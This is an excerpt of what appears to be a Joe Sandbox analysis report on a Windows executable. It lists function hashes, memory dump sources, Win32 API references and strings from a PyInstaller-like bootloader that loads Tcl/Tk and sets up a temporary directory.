Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction ID: a1680bba35acd47014aa6668d2f30a27f095ee79039f0b530a91b8cf7525da2a
Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
Instruction Fuzzy Hash: 7B81D472A0978146F7B4DF29944237ABE91FB45798FA4427DDE8D43B95DE3CD4008B10

Function 00007FF79A336488 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction ID: b5ba68e7e605aa953167356586af2ef34e425f88a1aaec1ec02921cdabd10c8d
Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
Instruction Fuzzy Hash: 7861E922E0F2924EFB7CAA39845467EF580AF417A0FD482BDDA1D466D5DF7DE8408720

Function 00007FF79A3219B4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: f8c3fa21a9e5d4ff3e1424cabc9d440e5ca1350828e38f365553b82dd11fdc04
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 47519136A1A65186FB349B39C140239B7B0EB48F68FA4417DCE8D17794DB3AE843C790

Function 00007FF79A3221D4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 600586b0d254e3a5b626896ce6f7f4695b4d7507985402837e5d62aeae3d32a4
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 19518032A1A65186F7B49B7AD440238B3A0EB54B68F64427DDE8C177D4CB3BE853C750

Function 00007FF79A321DC4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: d6c8d67a7b687154161b5f86c6343addb20dde05226fe4f69bfe0d582f8ef81b
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 5E51B476A1A65282FB749B39D540239B3A0EB48F68F64427DCE4C07794CB3AEC43C790

Function 00007FF79A321BC0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 5959495a68367a2e149b6d3595e93491277f0b37bff867042a3a1bc2e616da06
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 4451A376A1966186FB349B39C140238B7A1EB85B58FA4417DCE4C177A8CB3AE883C750

Function 00007FF79A3217B0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 257d949fb315416a5c83e1d5034e4a5e0c5d4fa4bd3838cb8b00ff841cc2f936
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: FB519C36A1A65186FB749B39D18023CB7A1EB44F58FA4517DCE4C177A8CB3AE842C790

Function 00007FF79A321FD0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 160c9809ff5220aaa94b2432a6141fba5b28e9361a20b111bad3e340a5ea406d
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 1851E332A1A65185F7B49B7AC840679B7A0EB48B58FA4807DCE4C177A4DF3AEC42C750

Function 00007FF79A325DA0 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: febe35841626d181b0f5300e621c22e86093d071466503cc9a011568746f7041
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 3441A9B2C0B78AA4F975993809046F8F6809F72BA0DD862FDDD9953BC3DD0C6B468121

Function 00007FF79A329F10 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction ID: 2eaea45fc05b31066398d85c45d8b3787a971ac5d3b433d6cb2aac813ed641f9
Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
Instruction Fuzzy Hash: 0341E122B25A5582FF14DF7ADA141A9F3A1BB48FD4B89D43ADE0D97B58DE3CD4418300

Function 00007FF79A328154 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction ID: a8dcd738786b8002831cfdaec4ca99354bf79da42eabf13a7e590dcbcdc96216
Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
Instruction Fuzzy Hash: CA31A032A0AB4282F774AB36A84013EB695AB85B90F94427DEE5D53BD5DF3CE0028314

Function 00007FF79A3395E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: ef1fdc203c6a95ebffaaff02d738b6aa26a21f5f6b9cc415b831f0078d58c463
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: 66F06871B192558AEBA89F7DE4126297BD0F7083C0FC0A07DE58D83B14DA3CD0618F14

Function 00007FF79A31D37C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction ID: 7366c29fb6501a3eb737bab81dc6d5e93695bc01f9e0f622386c062f22dc20c9
Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
Instruction Fuzzy Hash: EFA0012190E81AD0F668AB20E894125B320FB51340BC045BDF00E810A09F6CA4009220

Function 00007FF79A3176B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF79A3176C7
GetLastError.KERNEL32 ref: 00007FF79A3176D9
GetProcAddress.KERNEL32 ref: 00007FF79A317715
GetLastError.KERNEL32 ref: 00007FF79A317727
GetProcAddress.KERNEL32 ref: 00007FF79A317740
GetLastError.KERNEL32 ref: 00007FF79A317752
GetProcAddress.KERNEL32 ref: 00007FF79A31776B
GetLastError.KERNEL32 ref: 00007FF79A31777D
GetProcAddress.KERNEL32 ref: 00007FF79A317799
GetLastError.KERNEL32 ref: 00007FF79A3177AB
GetProcAddress.KERNEL32 ref: 00007FF79A3177C7
GetLastError.KERNEL32 ref: 00007FF79A3177D9
GetProcAddress.KERNEL32 ref: 00007FF79A3177F5
GetLastError.KERNEL32 ref: 00007FF79A317807
GetProcAddress.KERNEL32 ref: 00007FF79A317823
GetLastError.KERNEL32 ref: 00007FF79A317835
GetProcAddress.KERNEL32 ref: 00007FF79A317851
GetLastError.KERNEL32 ref: 00007FF79A317863

Strings

Tcl_FinalizeThread, xrefs: 00007FF79A3177BD, 00007FF79A3177DF
Tcl_ThreadQueueEvent, xrefs: 00007FF79A3179B7, 00007FF79A3179D9
Tcl_NewStringObj, xrefs: 00007FF79A317ACB, 00007FF79A317AED
Tcl_Finalize, xrefs: 00007FF79A31778F, 00007FF79A3177B1
Tcl_EvalFile, xrefs: 00007FF79A317B83, 00007FF79A317BA5
Tcl_CreateInterp, xrefs: 00007FF79A31770B, 00007FF79A31772D
Tcl_CreateObjCommand, xrefs: 00007FF79A317A6F, 00007FF79A317A91
GetProcAddress, xrefs: 00007FF79A3176EF
Tcl_DeleteInterp, xrefs: 00007FF79A3177EB, 00007FF79A31780D
Tcl_JoinThread, xrefs: 00007FF79A317875, 00007FF79A317897
Tcl_EvalEx, xrefs: 00007FF79A317BB1, 00007FF79A317BD3
Tk_Init, xrefs: 00007FF79A317C69, 00007FF79A317C8B
Tcl_GetCurrentThread, xrefs: 00007FF79A317847, 00007FF79A317869
Tcl_MutexUnlock, xrefs: 00007FF79A3178D1, 00007FF79A3178F3
Tcl_Free, xrefs: 00007FF79A317C3B, 00007FF79A317C5D
Tcl_MutexLock, xrefs: 00007FF79A3178A3, 00007FF79A3178C5
Tcl_ThreadAlert, xrefs: 00007FF79A3179E5, 00007FF79A317A07
Tcl_Alloc, xrefs: 00007FF79A317C0D, 00007FF79A317C2F
Tcl_MutexFinalize, xrefs: 00007FF79A3178FF, 00007FF79A317921
Tcl_ConditionFinalize, xrefs: 00007FF79A31792D, 00007FF79A31794F
Tcl_NewByteArrayObj, xrefs: 00007FF79A317AF9, 00007FF79A317B1B
Tcl_DoOneEvent, xrefs: 00007FF79A317761, 00007FF79A317783
Tcl_EvalObjv, xrefs: 00007FF79A317BDF, 00007FF79A317C01
Tcl_GetObjResult, xrefs: 00007FF79A317B55, 00007FF79A317B77
Tk_GetNumMainWindows, xrefs: 00007FF79A317C97, 00007FF79A317CB9
Failed to get address for %hs, xrefs: 00007FF79A3176E8
Tcl_GetString, xrefs: 00007FF79A317A9D, 00007FF79A317ABF
Tcl_Init, xrefs: 00007FF79A3176C0, 00007FF79A3176DF
Tcl_CreateThread, xrefs: 00007FF79A317819, 00007FF79A31783B
Tcl_GetVar2, xrefs: 00007FF79A317A13, 00007FF79A317A35
Tcl_ConditionNotify, xrefs: 00007FF79A31795B, 00007FF79A31797D
Tcl_SetVar2Ex, xrefs: 00007FF79A317B27, 00007FF79A317B49
Tcl_SetVar2, xrefs: 00007FF79A317A41, 00007FF79A317A63
Tcl_FindExecutable, xrefs: 00007FF79A317736, 00007FF79A317758
Tcl_ConditionWait, xrefs: 00007FF79A317989, 00007FF79A3179AB

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 91494cfba7f4e63e61bf467b69067d628a989dfdd0d1ab00133d375846eab0a8
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: CC028024E0FB0791FA75FF79A8545B4F2A1AF04795BC855BDE81E02260EF3CB5688630

Function 00007FF79A3181C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF79A3188A7,?,?,00000000,00007FF79A313CBB), ref: 00007FF79A31821C

Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA

Strings

\, xrefs: 00007FF79A318251
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79A318230
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF79A31828D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79A3182C9
CreateDirectory, xrefs: 00007FF79A31836C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF79A318363
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79A3181F3
%.*s, xrefs: 00007FF79A3182FC

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 0595ed2eb929890cbe8ae08134201a7ca7fa476e6322efb337edb24ced814a44
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 1F518111E1FA4281FB71FB31E8512BAF250EF94784FC8497DEA0E826D5EE2CE4058764

Function 00007FF79A312180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF79A3121AB
SelectObject.GDI32 ref: 00007FF79A3121F2
DrawTextW.USER32 ref: 00007FF79A312215
SelectObject.GDI32 ref: 00007FF79A31222B
ReleaseDC.USER32 ref: 00007FF79A31223B
MoveWindow.USER32 ref: 00007FF79A31228B
MoveWindow.USER32 ref: 00007FF79A3122CB
MoveWindow.USER32 ref: 00007FF79A31231E
MoveWindow.USER32 ref: 00007FF79A312366

Strings

P%, xrefs: 00007FF79A3121FF

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 13ef7a764b34b3ef9999af5a9d635282f5e369fb83412a475949f4e179058214
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 26510626608BA186E6349F32A4181BAF7A1F798B65F404139EBDE43694DF3CD045CB20

Function 00007FF79A3180B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF79A3180EF
GetWindowLongPtrW.USER32 ref: 00007FF79A31816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF79A318182
GetLastError.KERNEL32 ref: 00007FF79A31818C
SetWindowLongPtrW.USER32 ref: 00007FF79A3181A3

Strings

Needs to remove its temporary files., xrefs: 00007FF79A318175

Memory Dump Source

Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 943160455aeb8172fbd34ec377870683d2d11d3614ebec3616e78f1de3fd73d0
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: FE218B22F0EA4281F765AF7AA858179F250FF84B90FD8427DEA2D433D4DE2CD5918324

Function 00007FF79A326300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

